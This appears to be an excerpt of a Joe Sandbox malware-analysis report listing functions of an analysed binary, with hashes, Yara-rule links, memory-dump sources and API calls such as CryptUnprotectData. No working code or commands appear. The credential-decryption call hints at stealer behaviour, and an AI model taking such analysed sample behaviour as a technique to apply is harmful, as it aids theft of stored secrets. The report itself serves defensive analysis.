Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID:
API String ID: 3960555810-0
Opcode ID: 6688648a7e43a7bd4eae1e9c7a9f04cecb7cade2b75983923d1d9fd2a05de328
Instruction ID: 00978f4a3aa201fff8b03acd045a7c999ef93ab4ecc1f1cd9a676121e623bb17
Opcode Fuzzy Hash: 6688648a7e43a7bd4eae1e9c7a9f04cecb7cade2b75983923d1d9fd2a05de328
Instruction Fuzzy Hash: E6A18674508B918FD72ACF3980507A3BBE1AF57314F14896DC0EB4B693D736A509CB51

Function 00AA8395 Relevance: 1.6, APIs: 1, Instructions: 76encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00AA8454

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: 95c1150b06002c91492e9cd6fc5ae9e2c3c5b78f972c6a98d6ee630b58aae8e3
Instruction ID: bd65fb4e7cb45752ea8ec17599b6df050f6708b9b2ce20df1c10e42b8f574e13
Opcode Fuzzy Hash: 95c1150b06002c91492e9cd6fc5ae9e2c3c5b78f972c6a98d6ee630b58aae8e3
Instruction Fuzzy Hash: 3C11DAF69042405FCB288F24DC9077A77E6AB95314F19463DE4968B2D0DF349945CB51

Function 00AB67C0 Relevance: 1.5, Strings: 1, Instructions: 298COMMON

Download Yara Rule

Strings

sZ[N, xrefs: 00AB6A73

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID: InitializeThunk
String ID: sZ[N
API String ID: 2994545307-4056847104
Opcode ID: ca7b293c68a7920afa5a77a428a0f30a83501c556a14f0258c99e5cb4a60ba00
Instruction ID: 0bde8e8aab9c076eb3d5b260c50a51afc2280e4207609d66feab8b35b2214ece
Opcode Fuzzy Hash: ca7b293c68a7920afa5a77a428a0f30a83501c556a14f0258c99e5cb4a60ba00
Instruction Fuzzy Hash: CF813671A093009BEB109F65DC81BBBB7E9DFD6704F18842CE4859B383E27D9C059792

Function 00ACD930 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00ACFDFB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 00ACD95E

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 00A9D69D Relevance: 1.4, Strings: 1, Instructions: 140COMMON

Download Yara Rule

Strings

,3, xrefs: 00A9D7D3

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID:
String ID: ,3
API String ID: 0-3342342215
Opcode ID: 8e1ec5b56c10dcf935529c89a40643dcb95cfd18c3426fbefcba12b81f4b4315
Instruction ID: 56c9945e9dd284c27fc952afeda8e36b7749b86d0986b88b8c48b7d8d90d6077
Opcode Fuzzy Hash: 8e1ec5b56c10dcf935529c89a40643dcb95cfd18c3426fbefcba12b81f4b4315
Instruction Fuzzy Hash: 8A413332A497808FD328CF65CC8075BFBE2EBD1304F18892DE9D25B3A1C635D8418B96

Function 00ACDC1F Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

EFG@, xrefs: 00ACDC60

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID: InitializeThunk
String ID: EFG@
API String ID: 2994545307-813506099
Opcode ID: 42aba7fe510b36e9017eb192ac20a5257563c4f1391720f20c37d58480985014
Instruction ID: ed69b06ef5298d19577eb7f7815b4512058b0668461176d1e0ad31d3089b6ec9
Opcode Fuzzy Hash: 42aba7fe510b36e9017eb192ac20a5257563c4f1391720f20c37d58480985014
Instruction Fuzzy Hash: E43190B0619201AFD354CF29DC45B27B7E2FB95318F16C82CE096CB2A2D7B5D816CB52

Function 00A9AA50 Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

y#|!, xrefs: 00A9AAFF

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID:
String ID: y#|!
API String ID: 0-3264998935
Opcode ID: f84c5ff22ed45718b4a4ceff73c3aeeb8ce8b96fb5586a432f4546f1046e16fa
Instruction ID: b65764ce4b37629cc8ffb7204d480455e040e9562f6e2bbb27c34709299efe92
Opcode Fuzzy Hash: f84c5ff22ed45718b4a4ceff73c3aeeb8ce8b96fb5586a432f4546f1046e16fa
Instruction Fuzzy Hash: 2D3146B4E522189BDB14CFB5DEC66EEBF71EB85300F14429EE88477344D634490A8BE2

Function 00AD11B0 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0513a749267f7f1f136168042bc42b889fd47e18ac2a0b6af6deaf568e8e55fc
Instruction ID: 2ad8813afd6ac5d6ad3adbe30bb78e85eea10d4d34d31d2d175b0354dbc13cc9
Opcode Fuzzy Hash: 0513a749267f7f1f136168042bc42b889fd47e18ac2a0b6af6deaf568e8e55fc
Instruction Fuzzy Hash: 088153B26083006BD724CF59D880B7BB7E2EBD4314F19893EE9968B392D6359C418792

Function 00AD07C0 Relevance: .3, Instructions: 279COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1f405857b9cdf29c2392a818c4a2d312f8b8fe40189c716b86098128ea6ee514
Instruction ID: 0b7f2fd43af25a8dea145875dadb5bfa3cdab480c7c4891b716894d9a523bfc1
Opcode Fuzzy Hash: 1f405857b9cdf29c2392a818c4a2d312f8b8fe40189c716b86098128ea6ee514
Instruction Fuzzy Hash: E08115766053019BD714DF29D850B3FB7A3EBD4350F1AC42EE4868B369EB349D518782

Function 00AC83C0 Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 87fc25c73c90520437c671110bc3968dbd14fecf4b2a4fa3c86dbff67a98060c
Instruction ID: aa742fa2254894deecfaefe63496c79dc63f9632bade677f9b08eeb3a6014c59
Opcode Fuzzy Hash: 87fc25c73c90520437c671110bc3968dbd14fecf4b2a4fa3c86dbff67a98060c
Instruction Fuzzy Hash: 117124326493109BD301DFA8DC88F6BBBD6FBD5704F1A842CD9859B251EBB98C0593D2

Function 00ACAF20 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 72491ba6ca8d6d47f8e6fd1a101f4808d734f01a1b95bb3de7ab543668da8985
Instruction ID: bff2a7298a7201baf991f25ee555955ec10701f965e075696285a006ca6c6a1b
Opcode Fuzzy Hash: 72491ba6ca8d6d47f8e6fd1a101f4808d734f01a1b95bb3de7ab543668da8985
Instruction Fuzzy Hash: 20612672A083108FE710CF28D852B6BB7D2BBE4314F2E853DD4965B392E7769C418792

Function 00AAF700 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c734a5ce46ac9b8965949259b91a3923f38e02a51b0c4091970b7634a74a81d
Instruction ID: ddef16564ccbb8696f9e181c48591a17622020549799ee54390753820845c94d
Opcode Fuzzy Hash: 2c734a5ce46ac9b8965949259b91a3923f38e02a51b0c4091970b7634a74a81d
Instruction Fuzzy Hash: 60411374609340EFD314DFA4AC81A9F7BF4EB8A318F00463EF95586292E3359906C7A3

Function 00ABD44F Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4655d4ddfedaf005fb3be8ff7fb38cf0053839c0a35018c73c2ff6b7be3f36e5
Instruction ID: faa43e91713b55d17fe227d36cafceb0e7c68f7a40eba3478289ab87a29608b0
Opcode Fuzzy Hash: 4655d4ddfedaf005fb3be8ff7fb38cf0053839c0a35018c73c2ff6b7be3f36e5
Instruction Fuzzy Hash: 74411B716057818FE325CB3688A17B3BFD6AF96304F58496DC0D78B652E7786807C721

Function 00ACE16C Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a87241521e7581198c8dc45aaadf795c376f61ef1488d3ff71aa4f83093bfa85
Instruction ID: b18166b00bffdabc3188df0039383eb0fcd80d44e0c399aa30d14efc50795086
Opcode Fuzzy Hash: a87241521e7581198c8dc45aaadf795c376f61ef1488d3ff71aa4f83093bfa85
Instruction Fuzzy Hash: 263127B1A0A710CFDB04EF58D884B7BB796BBD4304F2A892DD4D64B251D7309C028782

Function 00A99830 Relevance: 1.7, APIs: 1, Instructions: 178COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(00000000), ref: 00A99A33

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
